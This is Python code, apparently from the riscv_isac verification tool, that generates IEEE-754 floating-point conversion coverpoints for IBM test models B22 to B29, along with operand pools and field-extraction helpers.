            op = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
            op_dataset.append([op, ' | Exponent: ' + str(int(exp,2)-1023) + ', Exponent in the range [-3, integer width+3]'])
            b22_comb.append((floatingPoint_tohex(flen,float(op)),))
        # Case 1: unbiased exponent < -3.
        bits = random.getrandbits(52)
        bits = bin(bits)[2:]
        front_zero = 52-len(bits)
        sig = '0'*front_zero + bits
        exp = random.randint(0,1020)
        exp = '{:011b}'.format(exp)
        sgn = random.getrandbits(1)
        sgn = '{:01b}'.format(sgn)
        ir_bin = ('0b'+sgn+exp+sig)
        op = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
        op_dataset.append([op, ' | Exponent: ' + str(int(exp,2)-1023) + ', Exponent less than -3'])
        b22_comb.append((floatingPoint_tohex(flen,float(op)),))
        # Case 3: unbiased exponent > xlen+3.
        # FIX: lower bound was xlen+1026 (= unbiased xlen+3) — belongs to case 2.
        bits = random.getrandbits(52)
        bits = bin(bits)[2:]
        front_zero = 52-len(bits)
        sig = '0'*front_zero + bits
        exp = random.randint(xlen+1027,2047)
        exp = '{:011b}'.format(exp)
        sgn = random.getrandbits(1)
        sgn = '{:01b}'.format(sgn)
        ir_bin = ('0b'+sgn+exp+sig)
        op = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
        op_dataset.append([op, ' | Exponent: ' + str(int(exp,2)-1023) + ', Exponent greater than (integer width+3)'])
        b22_comb.append((floatingPoint_tohex(flen,float(op)),))
    coverpoints = []
    k=0
    for c in b22_comb:
        cvpt = ""
        # Conversion opcodes take a single FP source operand.
        for x in range(1, 2):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += op_dataset[k][1]
        coverpoints.append(cvpt)
        k=k+1
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B22 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b23(flen, opcode, ops):
    '''
    IBM Model B23 Definition:
        This model creates boundary cases for the rounding to integers that might cause Overflow.
        A test case will be created with inputs equal to the maximum integer number in the destination's format (MaxInt), or close to it. In particular, the following FP numbers will be used:

        1. ±MaxInt
        2. ±MaxInt ± 0.01 (¼)
        3. ±MaxInt ± 0.1 (½)
        4. ±MaxInt ± 0.11 (¾)
        5. ±MaxInt ± 1

        Rounding Mode: All

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode

    :type flen: int
    :type opcode: str
    :type ops: int

    Abstract Dataset Description:
        Operand 1 = [ MaxInt-4, MaxInt+5 ]

    Implementation:
        - For offsets in (-4, 5), the dataset is appended with the hexadecimal
          encoding of maxnum plus the offset, i.e. the neighbouring floating
          point encodings on either side of the MaxInt anchor.
        - Since this model is meant for floating point conversion instructions, only one operand is expected.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with all rounding modes for that particular opcode.
    '''
    opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
    getcontext().prec = 40
    dataset = []
    if flen == 32:
        # 0x4f000000 encodes exactly 2**31 in binary32 (sign 0, exponent 158,
        # mantissa 0); 2**31-1 itself is not representable in binary32, so this
        # is the closest "MaxInt" anchor.
        maxnum = 0x4f000000
        for i in range(-4,5):
            # Offsets are applied to the raw integer encoding, producing the 4
            # adjacent FP encodings on each side of the anchor.
            dataset.append((hex(int(maxnum)+i),"| MaxInt + ({})".format(str(i))))
    elif flen == 64:
        # 0x43e0000000000000 encodes exactly 2**63 in binary64.
        maxnum = 0x43e0000000000000
        for i in range(-4,5):
            dataset.append((hex(int(maxnum)+i),"| MaxInt + ({})".format(str(i))))
    coverpoints = []
    for c in dataset:
        for rm in range(0,5):
            cvpt = ""
            for x in range(1, ops+1):
                cvpt += (extract_fields(flen,c[x-1],str(x)))
                cvpt += " and "
            cvpt += 'rm_val == '
            # NOTE(review): `opcode in "fcvt.d.s"` is a substring test, so it also
            # matches e.g. "fcvt.d" — confirm this is intended.
            if "fmv" in opcode or opcode in "fcvt.d.s":
                cvpt += '0'
            else:
                cvpt += str(rm)
            cvpt += ' # '
            for y in range(1, ops+1):
                cvpt += 'rs'+str(y)+'_val=='
                cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
                if(y != ops):
                    cvpt += " and "
            cvpt += " "+c[1]
            coverpoints.append(cvpt)
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+\
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B23 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return (coverpoints)
def ibm_b24(flen, opcode, ops):
    '''
    IBM Model B24 Definition:
        This model creates boundary cases for rounding to integer that might cause major loss of accuracy.
        A test-case will be created for each of the following inputs:

        1. ±0
        2. ±0 ± 0.01 (¼)
        3. ±0 ± 0.1 (½)
        4. ±0 ± 0.11 (¾)
        5. ±1
        6. ±1 + 0.01 (¼)
        7. ±1 + 0.1 (½)
        8. ±1 + 0.11 (¾)

        Rounding Mode: All

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode

    :type flen: int
    :type opcode: str
    :type ops: int

    Abstract Dataset Description:
        Operand 1 = [±0, ±0 ± 0.01, ±0 ± 0.1, ±0 ± 0.11, ±1, ±1 + 0.01, ±1 + 0.1, ±1 + 0.11]

    Implementation:
        - A nested loop over base value, fractional offset and the two sign
          operators forms the dataset defined above; the value is computed
          arithmetically (no eval) while the label keeps the "±b±f" spelling.
        - Depending on the value of flen, these values are then converted into their respective IEEE 754 hexadecimal values.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with all rounding modes for that particular opcode.
    '''
    opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
    getcontext().prec = 40
    operations = ['+','-']
    nums = [0,0.01,0.1,0.11]
    minnums = [0,1]
    dataset = []
    for minnum in minnums:
        for num in nums:
            for op1 in operations:
                for op2 in operations:
                    # Compute op1(minnum) op2 num directly instead of eval-ing
                    # the label string — same values, no eval.
                    base = minnum if op1 == '+' else -minnum
                    value = base + num if op2 == '+' else base - num
                    dataset.append((value, op1+str(minnum)+op2+str(num)))
    b24_comb = []
    for data in dataset:
        # Round-trip through "{:e}" to 6 significant digits, as the original
        # hex conversion expects.
        t = "{:e}".format(data[0])
        b24_comb.append((floatingPoint_tohex(flen,float(t)),data[1]))
    # De-duplicate while preserving insertion order (set() ordering varies with
    # PYTHONHASHSEED, making the generated file non-reproducible).
    b24_comb = list(dict.fromkeys(b24_comb))
    coverpoints = []
    for c in b24_comb:
        for rm in range(0,5):
            cvpt = ""
            for x in range(1, ops+1):
                cvpt += (extract_fields(flen,c[x-1],str(x)))
                cvpt += " and "
            cvpt += 'rm_val == '
            # NOTE(review): `opcode in "fcvt.d.s"` is a substring test — confirm.
            if "fmv" in opcode or opcode in "fcvt.d.s":
                cvpt += '0'
            else:
                cvpt += str(rm)
            cvpt += ' # '
            for y in range(1, ops+1):
                cvpt += 'rs'+str(y)+'_val=='
                cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
                if(y != ops):
                    cvpt += " and "
            cvpt += " | "+c[1]
            coverpoints.append(cvpt)
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+\
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B24 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return (coverpoints)
def ibm_b25(flen, opcode, ops, seed=10):
    '''
    IBM Model B25 Definition:
        This model creates a test-case for each of the following inputs:

        1. ±MaxInt
        2. ±0
        3. ±1
        4. Random number

    :param flen: Size of the integer registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to 10)

    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int

    Abstract Dataset Description:
        Operand 1 = [±MaxInt, ±0, ±1, Random number]

    Implementation:
        - The dataset is formed as per the dataset description.
        - rand_num is initialized to a random number in the range (1, maxnum).
        - Since this model is for an integer to floating point conversion instruction, the operands are presented in decimal format.
        - Coverpoints are then appended with all rounding modes for that particular opcode.
    '''
    random.seed(seed)
    opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
    # Kept for parity with the other models: sets the module-wide Decimal
    # precision even though this model does no Decimal arithmetic itself.
    getcontext().prec = 40
    dataset = [(0,"0"),(1,"1"),(-1,"-1")]
    if flen == 32:
        maxnum = 2**31-1
    elif flen == 64:
        maxnum = 2**63-1
    dataset.append((maxnum,"MaxInt"))
    dataset.append((-1*maxnum,"-MaxInt"))
    rand_num = int(random.uniform(1,maxnum))
    dataset.append((rand_num,"+ve Random Number"))
    dataset.append((-1*rand_num,"-ve Random Number"))
    b25_comb = []
    for data in dataset:
        b25_comb.append((int(data[0]),data[1]))
    coverpoints = []
    for c in b25_comb:
        for rm in range(0,5):
            cvpt = ""
            for x in range(1, ops+1):
                # NOTE(review): 'rs1_val' is hard-coded regardless of x; fine for
                # the single-operand conversion opcodes this model targets.
                cvpt += "rs1_val == "+str(c[x-1])
                cvpt += " and "
            cvpt += 'rm_val == '
            # NOTE(review): `opcode in "fcvt.d.wu"` is a substring test — confirm.
            if "fmv" in opcode or opcode in "fcvt.d.wu":
                cvpt += str(0)
            else:
                cvpt += str(rm)
            cvpt += ' # Number = '
            cvpt += c[1]
            coverpoints.append(cvpt)
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+\
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B25 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return (coverpoints)
def ibm_b26(xlen, opcode, ops, seed=10):
    '''
    IBM Model B26 Definition:
        One test case per possible count of significant bits in the integer
        input operand: an example is drawn from each of the ranges
        [0], [1], [2,3], [4,7], [8,15], ..., [(MaxInt+1)/2, MaxInt].

    :param xlen: Size of the integer registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to 10)

    :type xlen: int
    :type opcode: str
    :type ops: int
    :type seed: int

    Abstract Dataset Description:
        Operand 1 = Random number in [0], [1], [2,3], [4,7], ..., [(MaxInt+1)/2, MaxInt]

    Implementation:
        - A random representative is chosen from each bit-width bucket; the
          bucket upper bound doubles (2k+1) until it passes 2**(xlen-1)-1.
        - Operands are emitted in decimal (integer-to-float conversion model),
          combined with every rounding mode.
    '''
    random.seed(seed)
    opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
    dataset = [(0," # Number in [0]"),(1," # Number in [1]")]
    max_int = 2**(xlen-1)-1
    upper = 3
    while upper <= max_int:
        lower = int((upper+1)/2)
        pick = random.randint(lower, upper)
        dataset.append((pick, " # Random number chosen in the range: ["
                        + str(lower) + ", " + str(upper) + "]"))
        upper = upper*2 + 1
    coverpoints = []
    for entry in dataset:
        for rm in range(0, 5):
            cvpt = ""
            for idx in range(1, ops+1):
                # 'rs1_val' is intentionally fixed, matching the original model.
                cvpt += "rs1_val == " + str(entry[idx-1]) + " and "
            exact = "fmv" in opcode or opcode in "fcvt.d.wu"
            cvpt += 'rm_val == ' + (str(0) if exact else str(rm))
            cvpt += entry[1]
            coverpoints.append(cvpt)
    mess = ('Generated' + ' '*(5-len(str(len(coverpoints)))) + str(len(coverpoints))
            + ' ' + (str(32) if xlen == 32 else str(64))
            + '-bit coverpoints using Model B26 for ' + opcode + ' !')
    logger.info(mess)
    return comments_parser(coverpoints)
def ibm_b27(flen, opcode, ops, seed=10):
    '''
    IBM Model B27 Definition:
        This model tests the conversion of NaNs from a wider format to a narrow one. Each combination from the following table will create one test case (N represents the number of bits in the significand of the destination's format):

        ==================== ========================================================= =====================
        Value of the operand The N-1 MSB bits of the significand (excluding the first) The rest of the bits
        ==================== ========================================================= =====================
        QNaN                 All 0                                                     All 0
        SNan                 Not all 0                                                 Not all 0
        ==================== ========================================================= =====================

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to 10; currently unused — this model is fully deterministic.)

    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int

    Abstract Dataset Description:
        Operand 1 = [ SNaN, QNaN ]

    Implementation:
        - Dataset is the combination of the predefined snan and qnan values.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with rounding mode 0 for that particular opcode.
    '''
    opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
    if flen == 32:
        dataset = fsnan + fqnan
    elif flen == 64:
        dataset = dsnan + dqnan
    else:
        # Fail loudly instead of hitting a NameError on `dataset` below
        # (consistent with ibm_b21's handling of an invalid flen).
        logger.error('Invalid flen value!')
        sys.exit(1)
    coverpoints = []
    for c in dataset:
        cvpt = ""
        for x in range(1, ops+1):
            cvpt += (extract_fields(flen,c,str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c) + '(' + str(c) + ')'
            if(y != ops):
                cvpt += " and "
        coverpoints.append(cvpt)
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+\
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B27 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b28(flen, opcode, ops, seed=10):
    '''
    IBM Model B28 Definition:
        This model tests the conversion of a floating point number to an integral value, represented in floating-point format. A test case will be created for each of the following inputs:

        1. +0
        2. A random number in the range (+0, +1)
        3. +1
        4. Every value in the range (1.00, 10.11] (1 to 2.75 in jumps of 0.25)
        5. A random number in the range (+1, +1.11..11*2^precision)
        6. +1.11..11*2^precision
        7. +Infinity
        8. NaN
        9. -0
        10. A random number in the range (-1, -0)
        11. -1
        12. Every value in the range [-10.11, -1.00)
        13. A random number in the range (-1.11..11*2^precision , -1)
        14. -1.11..11*2^precision
        15. -Infinity

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to 10. Actual value is set with respect to the opcode calling the function)

    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int

    Abstract Dataset Description:
        Operand 1 = [ ±0, ±1, ±Infinity, Default NaN, A random number in the range (+0, +1), Every value in the range (1.00, 10.11] (1 to 2.75 in jumps of 0.25), A random number in the range (+1, +1.11..11*2^precision), ±1.11..11*2^precision, A random number in the range (-1, -0), Every value in the range [-10.11, -1.00), A random number in the range (-1.11..11*2^precision , -1) ]

    Implementation:
        - According to the given inputs, all cases are declared and appended to the dataset for flen=32 and flen=64.
        - Random numbers are obtained in the respective ranges and for absolute values, it is inherited from the dataset definition.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with rounding mode 0 for that particular opcode.
    '''
    random.seed(seed)
    opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
    dataset = []
    if flen == 32:
        dataset.append((fzero[0],"+0"))
        dataset.append((floatingPoint_tohex(32,float(random.uniform(0,1))),"A random number in the range (+0, +1)"))
        dataset.append((fone[0],"+1"))
        for i in range(125,300,25):
            dataset.append((floatingPoint_tohex(32, i/100),"Number = "+str(i/100)+" => Number ∈ (1,2.75]"))
        dataset.append((floatingPoint_tohex(32,float(random.uniform(1,2**31-1))),"A random number in the range (+1, +1.11..11*2^precision)"))
        dataset.append((floatingPoint_tohex(32,float(2**31-1)),"MaxInt"))
        dataset.append((finfinity[0],"+Infinity"))
        dataset.append((fsnan[0],"Signaling NaN"))
        dataset.append((fqnan[0],"Quiet NaN"))
        dataset.append((fzero[1],"-0"))
        dataset.append((floatingPoint_tohex(32,float(random.uniform(-1,0))),"A random number in the range (-1, -0)"))
        dataset.append((fone[1],"-1"))
        for i in range(-275,-100,25):
            dataset.append((floatingPoint_tohex(32, i/100),"Number = "+str(i/100)+" => Number ∈ [-2.75,-1)"))
        # FIX: was -2**31-1, which is -(2**31)-1 (precedence), i.e. off by 2
        # from the negated MaxInt used on the positive side.
        dataset.append((floatingPoint_tohex(32,float(random.uniform(-(2**31-1),-1))),"A random number in the range (-1.11..11*2^precision, -1)"))
        dataset.append((floatingPoint_tohex(32,float(-(2**31-1))),"-MaxInt"))
        dataset.append((finfinity[1],"-Infinity"))
    elif flen == 64:
        dataset.append((dzero[0],"+0"))
        dataset.append((floatingPoint_tohex(64,float(random.uniform(0,1))),"A random number in the range (+0, +1)"))
        dataset.append((done[0],"+1"))
        for i in range(125,300,25):
            dataset.append((floatingPoint_tohex(64, i/100),"Number = "+str(i/100)+" => Number ∈ (1,2.75]"))
        dataset.append((floatingPoint_tohex(64,float(random.uniform(1,2**63-1))),"A random number in the range (+1, +1.11..11*2^precision)"))
        dataset.append((floatingPoint_tohex(64,float(2**63-1)),"MaxInt"))
        dataset.append((dinfinity[0],"+Infinity"))
        dataset.append((dsnan[0],"Signaling NaN"))
        dataset.append((dqnan[0],"Quiet NaN"))
        dataset.append((dzero[1],"-0"))
        dataset.append((floatingPoint_tohex(64,float(random.uniform(-1,0))),"A random number in the range (-1, -0)"))
        dataset.append((done[1],"-1"))
        for i in range(-275,-100,25):
            dataset.append((floatingPoint_tohex(64, i/100),"Number = "+str(i/100)+" => Number ∈ [-2.75,-1)"))
        # FIX: same precedence bug as the 32-bit branch (-2**63-1 != -(2**63-1)).
        dataset.append((floatingPoint_tohex(64,float(random.uniform(-(2**63-1),-1))),"A random number in the range (-1.11..11*2^precision, -1)"))
        dataset.append((floatingPoint_tohex(64,float(-(2**63-1))),"-MaxInt"))
        dataset.append((dinfinity[1],"-Infinity"))
    coverpoints = []
    for c in dataset:
        cvpt = ""
        for x in range(1, ops+1):
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += " | "+c[1]
        coverpoints.append(cvpt)
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+\
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B28 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b29(flen, opcode, ops, seed=10):
    '''
    IBM Model B29 Definition:
        This model checks different cases of rounding of the floating point number. A test will be created for each possible combination of the Sign, LSB, Guard bit and the Sticky bit (16 cases for each operation).

    Rounding Mode: All

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to 10)

    :type flen: int
    :type opcode: str
    :type ops: int
    :param seed: int

    Abstract Dataset Description:
        Operand 1 = [All possible combinations of Sign, LSB, Guard and Sticky are taken]

    Implementation:
        - A random mantissa is obtained and is iterated for each sign in each digit in the binary number.
        - The exponent is always maintained at -3, in order to facilitate the shift process that occurs during the actual conversion.
        - The respective hexadecimal values are appended to the dataset along with the respective Least, Guard and Sticky bit value wherever available.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with all rounding modes for that particular opcode.
    '''
    random.seed(seed)
    sgns = ["0","1"]
    dataset = []
    if flen == 32:
        # 20 random mantissa bits + the 3 enumerated LSB/Guard/Sticky bits
        # make up the full 23-bit binary32 fraction.
        mant = random.getrandbits(20)
        mant = '{:020b}'.format(mant)
        for sgn in sgns:
            for i in range(8):
                # LeastGuardSticky[0]=LSB, [1]=Guard, [2]=Sticky
                LeastGuardSticky = '{:03b}'.format(i)
                # "01111100" is a biased exponent of 124, i.e. unbiased -3.
                # The leading "1" is a pad digit removed by the [3:] slice.
                hexnum = "0x" + hex(int("1"+sgn + "01111100" + mant + LeastGuardSticky,2))[3:]
                dataset.append((hexnum,"Exp = -3; Sign = {}; LSB = {}; Guard = {}; Sticky = {}"\
                    .format(sgn,LeastGuardSticky[0],LeastGuardSticky[1],LeastGuardSticky[2])))
    elif flen == 64:
        # 49 random mantissa bits + 3 enumerated bits = 52-bit binary64 fraction.
        mant = random.getrandbits(49)
        mant = '{:049b}'.format(mant)
        for sgn in sgns:
            for i in range(8):
                LeastGuardSticky = '{:03b}'.format(i)
                # "01111111100" is a biased exponent of 1020, i.e. unbiased -3.
                hexnum = "0x" + hex(int("1"+sgn + "01111111100" + mant + LeastGuardSticky,2))[3:]
                dataset.append((hexnum,"Exp = -3; Sign = {}; LSB = {}; Guard = {}; Sticky = {}"\
                    .format(sgn,LeastGuardSticky[0],LeastGuardSticky[1],LeastGuardSticky[2])))
    coverpoints = []
    for c in dataset:
        for rm in range(0,5):
            cvpt = ""
            for x in range(1, ops+1):
                cvpt += (extract_fields(flen,c[x-1],str(x)))
                cvpt += " and "
            cvpt += 'rm_val == '
            # fmv/fcvt.d.s ignore the rounding mode, so rm is pinned to 0.
            # NOTE(review): the rm loop still runs 5 times for those opcodes,
            # emitting 5 identical coverpoints — confirm whether intended.
            if "fmv" in opcode or "fcvt.d.s" in opcode:
                cvpt += '0'
            else:
                cvpt += str(rm)
            cvpt += ' # '
            for y in range(1, ops+1):
                cvpt += 'rs'+str(y)+'_val=='
                cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
                if(y != ops):
                    cvpt += " and "
            cvpt += " | "+c[1]
            coverpoints.append(cvpt)
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+\
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B29 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
| 40.462749 | 463 | 0.635045 | from riscv_isac.log import logger
import itertools
import struct
import random
import sys
import math
from decimal import *
# Predefined IEEE-754 operand pools used by the IBM coverage models below.
# 'f*' lists hold 32-bit (binary32) encodings, 'd*' lists hold 64-bit
# (binary64) encodings.  Each list pairs a positive encoding with its
# negative counterpart; the larger pools add a few extra bit patterns.
fzero = ['0x00000000', '0x80000000']
fminsubnorm = ['0x00000001', '0x80000001']
fsubnorm = ['0x00000002', '0x80000002', '0x007FFFFE', '0x807FFFFE', '0x00555555', '0x80555555']
fmaxsubnorm = ['0x007FFFFF', '0x807FFFFF']
fminnorm = ['0x00800000', '0x80800000']
fnorm = ['0x00800001', '0x80800001', '0x00855555', '0x80855555', '0x008AAAAA', '0x808AAAAA', '0x55000000', '0xD5000000', '0x2A000000', '0xAA000000']
fmaxnorm = ['0x7F7FFFFF', '0xFF7FFFFF']
finfinity = ['0x7F800000', '0xFF800000']
fdefaultnan = ['0x7FC00000', '0xFFC00000']
fqnan = ['0x7FC00001', '0xFFC00001', '0x7FC55555', '0xFFC55555']
fsnan = ['0x7F800001', '0xFF800001', '0x7FAAAAAA', '0xFFAAAAAA']
fone = ['0x3F800000', '0xBF800000']
dzero = ['0x0000000000000000', '0x8000000000000000']
dminsubnorm = ['0x0000000000000001', '0x8000000000000001']
dsubnorm = ['0x0000000000000002', '0x8000000000000002','0x0008000000000000', '0x0008000000000002', '0x0001000000000000', '0x8001000000000000','0x8001000000000003','0x8001000000000007']
dmaxsubnorm = ['0x000FFFFFFFFFFFFF', '0x800FFFFFFFFFFFFF']
dminnorm = ['0x0010000000000000', '0x8010000000000000']
dnorm = ['0x0010000000000002', '0x8010000000000002', '0x0011000000000000', '0x8011000000000000', '0x0018000000000000', '0x8018000000000000','0x8018000000000005','0x8018000000000007']
dmaxnorm = ['0x7FEFFFFFFFFFFFFF', '0xFFEFFFFFFFFFFFFF']
dinfinity = ['0x7FF0000000000000', '0xFFF0000000000000']
ddefaultnan = ['0x7FF8000000000000', '0xFFF8000000000000']
dqnan = ['0x7FF8000000000001', '0xFFF8000000000001', '0x7FFC000000000001', '0xFFFC000000000001']
dsnan = ['0x7FF0000000000001', '0xFFF0000000000001', '0x7FF4AAAAAAAAAAAA', '0xFFF4AAAAAAAAAAAA']
# NOTE(review): done[1] is '0xBF80000000000000', which is not the binary64
# encoding of -1.0 (that would be '0xBFF0000000000000') — confirm upstream.
done = ['0x3FF0000000000000', '0xBF80000000000000']
# Rounding-mode selector values used in the generated 'rm_val ==' clauses.
rounding_modes = ['0','1','2','3','4']
def num_explain(flen, num):
    '''
    Map an IEEE-754 hex encoding to the symbolic name of the predefined
    operand pool it belongs to (e.g. 'fzero', 'dqnan').  When the value
    matches no pool, it is classified as (sub)normal from its exponent
    field alone.

    :param flen: Size of the floating point registers (32 or 64)
    :param num: hex literal string, e.g. '0x3f800000' (case-insensitive)
    :return: symbolic pool name as a string
    '''
    # Ordered exactly as the pools are declared; the first match wins.
    named_buckets = [
        (fzero, 'fzero'),
        (fminsubnorm, 'fminsubnorm'),
        (fsubnorm, 'fsubnorm'),
        (fmaxsubnorm, 'fmaxsubnorm'),
        (fminnorm, 'fminnorm'),
        (fnorm, 'fnorm'),
        (fmaxnorm, 'fmaxnorm'),
        (finfinity, 'finfinity'),
        (fdefaultnan, 'fdefaultnan'),
        (fqnan, 'fqnan'),
        (fsnan, 'fsnan'),
        (fone, 'fone'),
        (dzero, 'dzero'),
        (dminsubnorm, 'dminsubnorm'),
        (dsubnorm, 'dsubnorm'),
        (dmaxsubnorm, 'dmaxsubnorm'),
        (dminnorm, 'dminnorm'),
        (dnorm, 'dnorm'),
        (dmaxnorm, 'dmaxnorm'),
        (dinfinity, 'dinfinity'),
        (ddefaultnan, 'ddefaultnan'),
        (dqnan, 'dqnan'),
        (dsnan, 'dsnan'),
        (done, 'done'),
    ]
    canonical = '0x' + num[2:].upper()     # pools store upper-case digits
    for bucket, label in named_buckets:
        if canonical in bucket:
            return label
    # Not a predefined value: look only at the exponent field.
    exp_width = 8 if flen == 32 else 11
    bits = bin(int('1' + num[2:], 16))[3:]   # '1' prefix preserves leading zeros
    exponent = bits[1:exp_width + 1]
    if int(exponent, 2) != 0:
        return 'fnorm' if flen == 32 else 'dnorm'
    else:
        return 'fsubnorm' if flen == 32 else 'dsubnorm'
def extract_fields(flen, hexstr, postfix):
    '''
    Render the sign, exponent and mantissa fields of an IEEE-754 encoding
    as a coverpoint condition string.

    :param flen: Size of the floating point registers (32 or 64)
    :param hexstr: IEEE-754 encoding as a hex literal string, e.g. '0x3F800000'
    :param postfix: operand index appended to the field names (fs1/fe1/fm1, ...)
    :type flen: int
    :type hexstr: str
    :type postfix: str
    :return: string of the form 'fs<p> == <s> and fe<p> == 0x<e> and fm<p> == 0x<m>'
    :raises ValueError: if flen is neither 32 nor 64
    '''
    if flen == 32:
        e_sz = 8
    elif flen == 64:
        e_sz = 11
    else:
        # Previously an unsupported flen crashed later with an unbound
        # local; fail fast with a clear message instead.
        raise ValueError('flen must be 32 or 64, got {}'.format(flen))
    # Prepending '1' before int() keeps leading zero bits; [3:] then drops
    # the '0b1' prefix, leaving exactly flen binary digits.
    bin_val = bin(int('1' + hexstr[2:], 16))[3:]
    sgn = bin_val[0]
    exp = bin_val[1:e_sz + 1]
    man = bin_val[e_sz + 1:]
    # The '1'/'10' prefixes below are the same padding trick applied to
    # hex(): slicing [3:] strips '0x' plus the pad digit, producing
    # zero-padded exponent/mantissa hex fields of fixed width.
    if flen == 32:
        string = 'fs' + postfix + ' == ' + str(sgn) + \
                 ' and fe' + postfix + ' == ' + '0x' + str(hex(int('1' + exp, 2))[3:]) + \
                 ' and fm' + postfix + ' == ' + '0x' + str(hex(int('10' + man, 2))[3:])
    else:
        string = 'fs' + postfix + ' == ' + str(sgn) + \
                 ' and fe' + postfix + ' == ' + '0x' + str(hex(int('10' + exp, 2))[3:]) + \
                 ' and fm' + postfix + ' == ' + '0x' + str(hex(int('1' + man, 2))[3:])
    return string
def fields_dec_converter(flen, hexstr):    # IEEE-754 Hex -> Decimal Converter
    '''
    Convert an IEEE-754 hex encoding into its decimal (float) value.

    :param flen: Size of the floating point registers (32 or 64)
    :param hexstr: IEEE-754 encoding as a hex literal string, e.g. '0x3F800000'
    :type flen: int
    :type hexstr: str
    :return: float value of the encoding.  For flen == 32, magnitudes that
             do not exceed 1e-45 (including zero) are clamped to +/-1e-45,
             preserving the original model behaviour.
    :raises ValueError: if flen is neither 32 nor 64

    The original implementation built a Python source string such as
    '+1.5*pow(2,3)' and eval()'d it; since repr(float) round-trips exactly,
    the direct arithmetic below yields bit-identical results without eval.
    '''
    if flen == 32:
        e_sz = 8
        bias = 127
        e_min = -126
    elif flen == 64:
        e_sz = 11
        bias = 1023
        e_min = -1022
    else:
        raise ValueError('flen must be 32 or 64, got {}'.format(flen))
